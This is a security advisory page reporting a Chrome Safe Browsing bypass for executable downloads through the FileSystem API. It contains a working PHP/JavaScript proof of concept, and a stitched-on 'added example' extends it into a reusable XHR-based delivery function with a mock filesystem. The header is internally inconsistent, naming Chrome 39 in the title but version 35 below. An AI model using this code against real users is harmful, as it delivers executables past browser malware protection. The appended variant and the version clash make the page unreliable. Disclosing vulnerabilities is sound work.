Chrome 39.0.2171 SafeBrowsing bypass via the FileSystem API

2015.04.19
Credit: vittgam
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

VULNERABILITY DETAILS

Safe Browsing for executable files can be bypassed with the FileSystem API: the .exe to be downloaded is written into a temporary filesystem and the page then navigates to the resulting filesystem: URL. In this test case a server-side PHP script emits the executable as a JavaScript byte array, but other techniques could be used to obtain the bytes (e.g. an XMLHttpRequest returning a Blob). You must not be in Incognito mode for this to work.

VERSION

Chrome Version: 35.0.1916.114 m + stable
Operating System: Windows XP Home Edition Service Pack 3

REPRODUCTION CASE

Test case available at https://server2.vittgam.net/testerone123/exedlvuln/vuln.php

<script>
(function () {
  var errorize = function (e) { console.log(e); };
  // Name of the staged executable; a direct download of a .exe would be checked by Safe Browsing.
  var filename = 'msghello-bypass.exe';
  // The PHP inlines msghello.exe as a JSON array of byte values, which becomes a Blob client-side.
  var blob = new Blob([new Uint8Array(<?php echo str_replace(',', ', ', json_encode(array_map('ord', str_split(file_get_contents('msghello.exe'))))); ?>)], {type: 'application/octet-stream'});
  window.webkitRequestFileSystem(window.TEMPORARY, 1048576, function (fs) {
    var createFile = function () {
      fs.root.getFile(filename, {create: true, exclusive: true}, function (fileEntry) {
        fileEntry.createWriter(function (writer) {
          writer.onwriteend = function () {
            // Navigating to the filesystem: URL of the staged file triggers the download.
            window.location.href = fileEntry.toURL();
          };
          writer.onerror = errorize;
          writer.write(blob);
        }, errorize);
      }, errorize);
    };
    // Remove any file left over from a previous run, then (re)create it; if it does not exist,
    // the error callback of getFile goes straight to creation.
    fs.root.getFile(filename, {create: false}, function (fileEntry) {
      fileEntry.remove(createFile, errorize);
    }, createFile);
  }, errorize);
})();
</script>
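The following is an added example, not code from the original report or from Chromium: it shows the "XMLHttpRequest returning a Blob" variant that the report mentions but does not include, with the FileSystem API steps (remove a stale copy, create exclusively, write, navigate to toURL()) factored into one function. So that the staging flow can be exercised offline, the block also carries a constructed stand-in for the slice of Chrome's TEMPORARY filesystem it uses. The names stageAndNavigate, runInBrowser and FakeFileSystem, the origin https://attacker.example and the path /downloads/msghello.exe are assumptions for illustration; webkitRequestFileSystem, getFile, createWriter, remove and toURL are Chrome's real, non-standard FileSystem API calls.

```javascript
// Added example, not code from the original report: the "XMLHttpRequest returning a Blob"
// variant the report mentions, with the FileSystem API steps factored into one function
// that can also be exercised offline against a constructed stand-in for Chrome's
// TEMPORARY filesystem. stageAndNavigate, runInBrowser, FakeFileSystem and the URL
// '/downloads/msghello.exe' are illustrative names and assumptions; the API calls used
// (webkitRequestFileSystem, getFile, createWriter, remove, toURL) are Chrome's real,
// non-standard FileSystem API.

// Stage `blob` as `filename` inside `fs` (a DOMFileSystem) and pass the resulting
// filesystem: URL to `navigate`. Same flow as the report: delete a stale copy, create the
// file exclusively, write the bytes, then navigate to entry.toURL().
function stageAndNavigate(fs, filename, blob, navigate) {
  return new Promise(function (resolve, reject) {
    function createAndWrite() {
      fs.root.getFile(filename, { create: true, exclusive: true }, function (entry) {
        entry.createWriter(function (writer) {
          writer.onwriteend = function () {
            var url = entry.toURL(); // filesystem:<origin>/temporary/<filename>
            navigate(url);
            resolve(url);
          };
          writer.onerror = reject;
          writer.write(blob);
        }, reject);
      }, reject);
    }
    // getFile(create:false) succeeds only if a previous run left the file behind; remove it
    // first. Its error callback (file not found) goes straight to creation.
    fs.root.getFile(filename, { create: false }, function (entry) {
      entry.remove(createAndWrite, reject);
    }, createAndWrite);
  });
}

// Browser entry point: fetch the executable as a Blob over XHR instead of inlining its bytes
// in the page. Chrome-only; in Incognito mode webkitRequestFileSystem calls the error
// callback instead, which is why the report says the test must run in a normal window.
function runInBrowser(exeUrl, filename) {
  return new Promise(function (resolve, reject) {
    var xhr = new XMLHttpRequest();
    xhr.open('GET', exeUrl);
    xhr.responseType = 'blob';
    xhr.onerror = reject;
    xhr.onload = function () {
      if (xhr.status !== 200) { return reject(new Error('HTTP ' + xhr.status)); }
      window.webkitRequestFileSystem(window.TEMPORARY, xhr.response.size, function (fs) {
        stageAndNavigate(fs, filename, xhr.response, function (url) { window.location.href = url; })
          .then(resolve, reject);
      }, reject);
    };
    xhr.send();
  });
}

// Constructed stand-in for the slice of the FileSystem API used above, so the staging flow
// can run outside a browser. Files live in a Map; toURL() uses Chrome's filesystem: URL
// format; getFile() reports PATH_EXISTS_ERR / NOT_FOUND_ERR like the real API. The real
// FileWriter fires onwriteend asynchronously; this one fires it synchronously after write().
function FakeFileSystem(origin) {
  var files = new Map();
  function entryFor(name) {
    return {
      toURL: function () { return 'filesystem:' + origin + '/temporary/' + name; },
      remove: function (ok) { files.delete(name); ok(); },
      createWriter: function (ok) {
        ok({
          write: function (data) {
            files.set(name, data);
            if (this.onwriteend) { this.onwriteend(); }
          }
        });
      }
    };
  }
  this.files = files;
  this.root = {
    getFile: function (name, opts, ok, err) {
      if (files.has(name)) {
        if (opts.create && opts.exclusive) { return err(new Error('PATH_EXISTS_ERR')); }
        return ok(entryFor(name));
      }
      if (!opts.create) { return err(new Error('NOT_FOUND_ERR')); }
      files.set(name, null);
      ok(entryFor(name));
    }
  };
}

// Offline demo against the stand-in (constructed two-byte "MZ" payload, not a real executable).
if (typeof window === 'undefined') {
  var demoFs = new FakeFileSystem('https://attacker.example');
  stageAndNavigate(demoFs, 'msghello-bypass.exe', new Uint8Array([0x4d, 0x5a]), function (url) {
    console.log('would navigate to ' + url);
  });
}
```

In a real Chrome window the call would be runInBrowser('/downloads/msghello.exe', 'msghello-bypass.exe'); the only part that differs from the report's test case is where the bytes come from (an XHR Blob rather than a PHP-inlined byte array). The stand-in exists so the remove/create/write/navigate sequence and the filesystem: URL it ends on can be checked without a browser.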

References:

https://code.google.com/p/chromium/issues/detail?id=380663


Copyright 2024, cxsecurity.com